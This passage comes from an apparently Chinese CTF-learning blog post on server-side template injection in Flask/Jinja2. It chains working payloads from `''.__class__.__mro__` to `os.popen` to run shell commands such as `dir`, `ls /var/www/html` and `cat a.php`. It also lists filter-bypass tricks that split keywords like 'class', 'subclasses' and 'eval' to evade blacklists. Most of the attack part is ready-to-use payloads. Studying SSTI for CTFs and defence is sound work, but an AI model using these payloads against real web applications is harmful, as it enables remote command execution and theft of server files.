<p>然后我们使用<code>&#123;&#123;''.__class__&#125;&#125;</code>获取字符串的类对象</p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-117-1024x94.png" alt="img"></p>
<p>使用<code>&#123;&#123;''.__class__.__mro__&#125;&#125;</code>寻找基类</p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-119-1024x108.png" alt="img"></p>
<p>使用<code>&#123;&#123;''.__class__.__mro__[1].__subclasses__()&#125;&#125;</code>寻找可用的引用</p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-120-1024x546.png" alt="img"></p>
<p>然后我们使用下标的方式获取<code>os._wrap_close</code>，使用<code>&#123;&#123;''.__class__.__mro__[1].__subclasses__()[138]&#125;&#125;</code></p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-121-1024x129.png" alt="img"></p>
<p>然后我们利用<code>__init__.__globals__</code>来找os类下的所有方法及变量和参数。使用<code>&#123;&#123;''.__class__.__mro__[1].__subclasses__()[138].__init__.__globals__&#125;&#125;</code></p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-122-1024x540.png" alt="img"></p>
<p>我们发现这里有一个popen函数，然后我们使用他，poc为<code>&#123;&#123;''.__class__.__mro__[1].__subclasses__()[138].__init__.__globals__['popen']('dir').read()&#125;&#125;</code></p>
<p><img src="/images/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/%E5%9B%BE%E7%89%87-123-1024x123.png" alt="img"></p>
<h3 id="其他知识点"><a href="#其他知识点" class="headerlink" title="其他知识点"></a>其他知识点</h3><blockquote>
<p>__base__ 以元组返回一个类直接所继承的类<br>__mro__ 以元组返回继承关系链<br>__class__ 返回对象所属的类<br>__globals__ 以dict返回函数所在模块命名空间中的所有变量<br>__subclasses__() 以列表返回类的子类<br>__init__ 类的初始化方法<br><em>builtin</em> 内建函数，python中可以直接运行一些函数，例如int(),list()等等，这些函数可以在__builtins__中可以查到。查看的方法是dir(__builtins__)</p>
<p>ps：在py3中__builtin__被换成了builtin __builtin__ 和 __builtins__之间是什么关系呢？<br>在主模块main中，__builtins__是对内建模块__builtin__本身的引用，即__builtins__完全等价于__builtin__，二者完全是一个东西，不分彼此。<br>非主模块main中，__builtins__仅是对__builtin__.__dict__的引用，而非__builtin__本身</p>
</blockquote>
<h4 id="CTF中的一些绕过技巧"><a href="#CTF中的一些绕过技巧" class="headerlink" title="CTF中的一些绕过技巧"></a>CTF中的一些绕过技巧</h4><p>1、过滤[]等符号：使用gititem绕过。<br>如原poc <code>&#123;&#123;"".__class__.__bases__[0]&#125;&#125;</code>，绕过后<code>&#123;&#123;"".__class__.bases__.__getitem__(0)&#125;&#125;</code></p>
<p>2、过滤了subclasses，使用拼凑法绕过<br>如原poc：</p>
<p> <code>&#123;&#123;"".__class__.__bases__[0].__subclasses__()&#125;&#125;</code>，绕过后<code>&#123;&#123;"".__class__.bases[0]__'subcla'+'sses'&#125;&#125;</code></p>
<p>3、过滤了class，使用session</p>
<p><code> &#123;&#123;session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0].__subclasses__()[118]&#125;&#125;</code><br>多个bases[0]是因为一直在向上找object类。使用mro就会很方便</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;session[&#x27;__cla&#x27;+&#x27;ss__&#x27;].__mro__[12]&#125;&#125;</span><br><span class="line">或者</span><br><span class="line">request[&#x27;__cl&#x27;+&#x27;ass__&#x27;].__mro__[12]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>4、poc</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13][&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;ls  /var/www/html&quot;).read()&#x27; )</span><br><span class="line"></span><br><span class="line">object.__subclasses__()[59].__init__.func_globals[&#x27;linecache&#x27;].__dict__[&#x27;o&#x27;+&#x27;s&#x27;].__dict__[&#x27;sy&#x27;+&#x27;stem&#x27;](&#x27;ls&#x27;)</span><br><span class="line"></span><br><span class="line">&#123;&#123;request[&#x27;__cl&#x27;+&#x27;ass__&#x27;].__base__.__base__.__base__[&#x27;__subcla&#x27;+&#x27;sses__&#x27;]()[60][&#x27;__in&#x27;+&#x27;it__&#x27;][&#x27;__&#x27;+&#x27;glo&#x27;+&#x27;bal&#x27;+&#x27;s__&#x27;][&#x27;__bu&#x27;+&#x27;iltins__&#x27;][&#x27;ev&#x27;+&#x27;al&#x27;](&#x27;__im&#x27;+&#x27;port__(&quot;os&quot;).po&#x27;+&#x27;pen(&quot;ca&quot;+&quot;t a.php&quot;).re&#x27;+&#x27;ad()&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>再次感谢两位师傅的文章！</p>
<p>如果文章有何不妥之处，请您指出。</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>柷澂
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://monkeyx1.github.io/2022/09/11/flask%E4%B9%8Bssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E7%9F%A5%E8%AF%86%E7%82%B9%E5%8F%8A%E5%A4%8D%E7%8E%B0/" title="flask之ssti模板注入知识点及复现">https://monkeyx1.github.io/2022/09/11/flask之ssti模板注入知识点及复现/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/09/08/Java%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95-%E5%9B%9B/" rel="prev" title="Java学习记录(四)">
                  <i class="fa fa-chevron-left"></i> Java学习记录(四)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/09/12/Python%E5%AD%A6%E4%B9%A0-%E4%B8%80/" rel="next" title="Python学习(一)">
                  Python学习(一) <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2022 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">柷澂</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">181k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:44</span>
  </span>
</div><div>
  <span id="sitetime"></span>
  <script language=javascript>
      function siteTime(){
          window.setTimeout("siteTime()", 1000);
          var seconds = 1000;
          var minutes = seconds * 60;
          var hours = minutes * 60;
          var days = hours * 24;
          var years = days * 365;
          var today = new Date();
          var todayYear = today.getFullYear();
          var todayMonth = today.getMonth()+1;
          var todayDate = today.getDate();
          var todayHour = today.getHours();
          var todayMinute = today.getMinutes();
          var todaySecond = today.getSeconds();
          /* 
          Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
          year - 作为date对象的年份，为4位年份值
          month - 0-11之间的整数，做为date对象的月份
          day - 1-31之间的整数，做为date对象的天数
          hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
          minutes - 0-59之间的整数，做为date对象的分钟数
          seconds - 0-59之间的整数，做为date对象的秒数
          microseconds - 0-999之间的整数，做为date对象的毫秒数
      */
          var t1 = Date.UTC(2021,12,23,11,40,00); //北京时间2018-2-13 00:00:00
          var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
          var diff = t2-t1;
      var diffYears = Math.floor(diff/years);
      var diffDays = Math.floor((diff/days)-diffYears*365);
      var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
      var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
      var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
      document.getElementById("sitetime").innerHTML=" 已运行"+/*diffYears+" 年 "+*/diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
    }
      siteTime();
  </script>
</div>

    </div>
  </footer>

  

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  

  <script class="next-config" data-name="leancloud_visitors" type="application/json">{"enable":true,"app_id":"ccA2VsTMA0zc7SQqWsCEBhP6-gzGzoHsz","app_key":"RzrgPNrOtq5LckltkJZDwE0z","server_url":null,"security":true}</script>
  <script src="/js/third-party/statistics/lean-analytics.js"></script>



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body>
</html>
